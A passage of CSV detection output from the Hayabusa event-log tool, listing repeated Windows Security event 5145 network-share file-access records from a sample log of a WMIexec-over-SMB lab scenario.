0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.109 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.125 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.125 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.150 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.182 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.182 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.197 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.213 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.213 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8#\64d113caa8b81caec5c21797931b5624 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml\10483ca149b5c651d217edbf2f3169b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xaml.Hosting\e9062794b3050c9564584baa07300c10 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\77bc1a994f64193efc124c297b93fdb7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.235 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.251 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.84e525b7#\1e30da61ac8d97f7b17cdce57fb6a874 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.251 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.251 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\6f7a4225a199ad7894379512ca6ae50c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\TaskScheduler\313baced763e9e5054e7694d5594cde5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Temp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomatio4e153cb6#\a1f231be2afa2e51dfc0a1f76644d2f7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationClient\abccca8c6f96e1d3c686a69acb31b9a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationProvider\c926f90d88838d450951cd6c5b41c961 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.266 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\UIAutomationTypes\3be4139a741b447ab35a2c788a2f4559 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.282 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Windows.Serf5111484#\d081d0c6a64c64fa9afe4e545f2eaa05 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 11:32:31.298 +00:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\WindowsBase\9bbf715cfb5360c95acd27b199083854 